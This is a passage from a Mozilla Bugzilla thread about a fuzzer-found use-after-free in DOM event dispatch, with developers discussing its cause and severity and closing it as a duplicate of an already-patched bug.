Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3981==ABORTING
|
||
Updated•8 years ago
|
Group: core-security → dom-core-security
Keywords: csectype-uaf,
sec-critical
|
|
||
Updated•8 years ago
|
status-firefox56:
--- → affected
Version: 55 Branch → Trunk
|
|
||
Comment 3•8 years ago
|
||
This test cases uses fuzzPriv.trustedKeyEvent, so maybe the rating is too high.
Masayuki, do you have time to look at this? Thanks.
Flags: needinfo?(masayuki)
|
Assignee | |
Comment 4•8 years ago
|
||
Looks like that the WidgetEvent came from dom::Event. So, perhaps, the dom::Event is destroyed by the GC or CC.
I'm not sure if this is so high because this tries to read a bool member which is wrapped by two inline methods.
Flags: needinfo?(masayuki)
|
|
Assignee | |
Comment 5•8 years ago
|
||
I think that this is the cause.
Looks like that nobody guarantees the lifetime of dispatching DOM event from EventTarget::DispatchEvent().
https://searchfox.org/mozilla-central/source/__GENERATED__/dom/bindings/EventTargetBinding.cpp#955,960,963,974
(Although I'm not sure how to reproduce this because when I built ASAN build in my environments for similar bug, I couldn't reproduce it.)
|
||
Comment 6•8 years ago
|
||
obj sure should be rooted there, and that is keeping event alive.
|
|
||
Comment 7•8 years ago
|
||
Hmm, but does obj point to some wrapper around the actual event's JS wrapper and then something cuts the edge between those wrappers.
|
|
||
Comment 8•8 years ago
|
||
If that is a case, then this isn't a dom event issue at all, but bindings.
|
|
||
Comment 9•8 years ago
|
||
Comment on attachment 8883828 [details] [diff] [review]
Patch
The thing is that caller of DispatchEvent really should keep Event alive.
Why obj doesn't in bindings doesn't do it? Or is that a wrapper on top of the JS wrapper for the event and we somehow cut the edge?
If that is the case, this is generic problem and shouldn't be fixed in event handling code but in bindings or js engine.
bz is on vacation, but perhaps peterv has something to say here.
Flags: needinfo?(peterv)
Attachment #8883828 -
Flags: review?(bugs)
|
|
||
Comment 10•8 years ago
|
||
This sounds a little like bug 1371259, which bz has patched, but hasn't landed yet.
|
||
Comment 11•8 years ago
|
||
Yeah, most likely fixed by the patches from bug 1371259, but it'd be good to verify that.
Flags: needinfo?(peterv)
|
||
Updated•8 years ago
|
status-firefox54:
--- → wontfix
status-firefox55:
--- → affected
status-firefox-esr52:
--- → affected
|
||
Comment 12•8 years ago
|
||
Right, based on reading the testcase+stacks I'm pretty sure this is a duplicate of bug 1371259.
Depends on: CVE-2017-7801
|
|
||
Comment 13•8 years ago
|
||
Nils, this should be fixed across all supported branches with the latest ASAN CI builds. Can you please confirm?
Flags: needinfo?(nils)
|
Reporter | |
Comment 14•8 years ago
|
||
Ryan, just tried to reproduce on the latest build and it does not crash anymore.
Flags: needinfo?(nils)
|
|
||
Comment 15•8 years ago
|
||
Thanks for confirming.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
No longer depends on: CVE-2017-7801
Resolution: --- → DUPLICATE
|
||
Updated•8 years ago
|
Flags: sec-bounty?
|
|
||
Updated•8 years ago
|
Flags: sec-bounty? → sec-bounty-
|
|
||
Updated•5 years ago
|
|
|
||
Updated•4 years ago
|
Group: dom-core-security
|
||
Updated•8 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•